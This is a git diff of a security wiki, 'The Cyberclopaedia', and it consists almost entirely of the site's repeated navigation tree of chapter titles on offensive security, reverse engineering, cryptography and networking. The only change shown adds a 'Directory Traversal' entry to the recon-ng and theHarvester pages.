    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Reconnaissance/OSINT/Tools/recon-ng.html b/docs/Reconnaissance/OSINT/Tools/recon-ng.html index 07f62c8d..bc62f897 100644 --- a/docs/Reconnaissance/OSINT/Tools/recon-ng.html +++ b/docs/Reconnaissance/OSINT/Tools/recon-ng.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -274,22 +274,6 @@

profiler

- - diff --git a/docs/Reconnaissance/OSINT/Tools/theHarvester.html b/docs/Reconnaissance/OSINT/Tools/theHarvester.html index 9e9cae89..c9b33d7d 100644 --- a/docs/Reconnaissance/OSINT/Tools/theHarvester.html +++ b/docs/Reconnaissance/OSINT/Tools/theHarvester.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
